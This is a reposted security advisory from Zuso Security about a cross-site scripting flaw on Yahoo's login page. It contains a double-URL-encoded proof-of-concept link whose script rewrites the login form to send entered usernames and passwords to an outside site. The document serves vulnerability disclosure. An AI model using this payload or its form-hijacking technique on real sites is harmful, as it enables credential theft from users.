[转载]Yahoo Global XSS (login page)
信息来源:Zuso SecurityAs you know, Yahoo is a well-known website in the world. We found that there are some XSS vulnerabilities by encoding the HTML code twice in the URI. We have notified the vendor on 4.24 already.
POC: [url=https://login.yahoo.com/config/login?.pd=c%3d%2522%253e%253cscript%3eeval(unescape(%2522%252564%25256F%252563%252575%25256D%252565%25256E%252574%25252E%252567%252565%252574%252545%25256C%252565%25256D%252565%25256E%252574%252573%252542%252579%25254E%252561%25256D%252565%252528%252522%25256C%25256F%252567%252569%25256E%25255F%252566%25256F%252572%25256D%252522%252529%25255B%252530%25255D%25252E%252561%252563%252574%252569%25256F%25256E%25253D%252522%252568%252574%252574%252570%25253A%25252F%25252F%252577%252577%252577%25252E%25257A%252575%252573%25256F%25252E%25256F%252572%252567%25252E%252574%252577%25252F%252564%252565%25256D%25256F%25252E%252570%252568%252570%252522%2522))%253c/script%253e%253cscript]Link[/url]
Enter any username and password you like, and then submit it, you'll see what happen.
The original advisory is located at http://www.zuso.org.tw/index.php?option=com_content&task=view&id=32&Itemid=1
Zuso Security is a group which is focus on web-based security in Taiwan.
Zuso Security -
vuln_AT_zuso.org.tw (vuln info only)
http://www.zuso.org.tw/
irc.zuso.org.tw #zuso (SSL tunnel: port 994)
页:
[1]